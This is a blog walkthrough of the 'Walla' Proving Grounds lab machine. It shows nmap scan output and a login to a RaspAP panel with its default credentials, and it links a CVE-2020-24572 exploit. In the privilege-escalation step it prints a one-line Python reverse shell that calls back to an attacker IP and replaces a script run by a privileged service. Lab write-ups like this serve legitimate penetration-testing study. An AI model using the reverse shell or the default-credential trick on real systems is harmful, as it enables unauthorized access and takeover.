Secsheep

愿你从知识中获得勇气和力量。

Home › uncategorized › PG-Walla-Wp

PG-Walla-Wp

Secsheep 2023年10月4日    

目录

Toggle
  • 1.Reconnaissance
  • 2.Enumeration
  • 3.Foothold
  • 4.Privilege Escalation

1.Reconnaissance

 

sudo ./nmapAutomator.sh 192.168.185.97 all

Running all scans on 192.168.185.97

Host is likely running Unknown OS!

———————Starting Port Scan———————–

 

PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain

 

———————Starting Script Scan———————–

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02715dc8b943ba6ac8ed15c56cb2f5f9 (RSA)
| 256 f3e510d416a99e034738baac18245328 (ECDSA)
|_ 256 024f99ec856d794388b2b57cf091fe74 (ED25519)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=walla
| Subject Alternative Name: DNS:walla
| Not valid before: 2020-09-17T18:26:36
|_Not valid after: 2030-09-15T18:26:36
|_smtp-commands: walla, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open tcpwrapped
Service Info: Host: walla; OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

———————Starting Full Scan————————

PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
422/tcp open ariel3
8091/tcp open jamlink
42042/tcp open unknown

 

Making a script scan on extra ports: 422, 8091, 42042

PORT STATE SERVICE VERSION
422/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02715dc8b943ba6ac8ed15c56cb2f5f9 (RSA)
| 256 f3e510d416a99e034738baac18245328 (ECDSA)
|_ 256 024f99ec856d794388b2b57cf091fe74 (ED25519)
8091/tcp open http lighttpd 1.4.53
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=RaspAP
|_http-title: Site doesn’t have a title (text/html; charset=UTF-8).
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: lighttpd/1.4.53
42042/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 02715dc8b943ba6ac8ed15c56cb2f5f9 (RSA)
| 256 f3e510d416a99e034738baac18245328 (ECDSA)
|_ 256 024f99ec856d794388b2b57cf091fe74 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

———————-Starting UDP Scan————————

 

No UDP ports are open

 

———————Starting Vulns Scan———————–

Running CVE scan on all ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.9p1:
|_ PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open tcpwrapped
422/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.9p1:
|_ PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
8091/tcp open http lighttpd 1.4.53
| vulners:
| cpe:/a:lighttpd:lighttpd:1.4.53:
|_ CVE-2019-11072 7.5 https://vulners.com/cve/CVE-2019-11072
|_http-server-header: lighttpd/1.4.53
42042/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.9p1:
|_ PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
Service Info: Host: walla; OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

Running Vuln scan on all ports

2.Enumeration

When we access to port 8091 in forefox brower ,there is  prompted to login4

and now we don’ t have any Creds,then tried use “admin:admin” ,”admin:password:

It doesn’t work so I look at the message the pop-up gives us which is “RaspAP”. Instantly my mind starts to think about what this could be so I google it and find out it’s an access point.

Well,checked the “RaspAP” official website,and it indicatet that username and password  is    “admin:secre”.”

 

3.Foothold

So,Use this creds we can login to port 8091.

In this case RaspAP version 2.5 is running and there is an exploit for it. I quickly find one on github. POC:

https://github.com/lb0x/cve-2020-24572. Initially the exploit

 

4.Privilege Escalation

Then,upload the tool of linpeas.sh to enumerate the PE Vector

Then find a Vulnerable service

As www-data we can delete the file /home/walter/wifi_reset.py and replace it with a python reverse shell of the same name:

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.203",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")' > /home/walter/wifi_reset.py

 Previous Post

PG-Shenzi-Wp

―2023年10月3日

Next Post 

PG-Pelican-Wp

―2023年10月4日

Author: Secsheep

Related Articles

Secsheep ― 2023年10月7日 | No Comment

PG-Access-Wp

1.Reconnaissance We

Secsheep ― 2023年5月22日 | 1 Comment

转载-Oscp训练靶场之HTB-Redcross

Secsheep ― 2025年1月8日 | No Comment

2025-1-8

Secsheep ― 2024年8月14日 | No Comment

我对Kerberos协议的理解

Secsheep ― 2024年7月5日 | No Comment

加油,前方就是胜利!

Secsheep ― 2024年6月29日 | No Comment

内网信息收集

Secsheep ― 2024年6月28日 | No Comment

Cobaltstriker 使用篇

Secsheep ― 2024年6月26日 | No Comment

内网篇-Kerberos相关安全问题和攻击手法

Secsheep ― 2024年6月26日 | No Comment

内网信息收集总结

Secsheep ― 2024年6月25日 | No Comment

域森林环境搭建总结

Leave a Reply Cancel reply

Copyright © Secsheep 赣ICP备2023005527号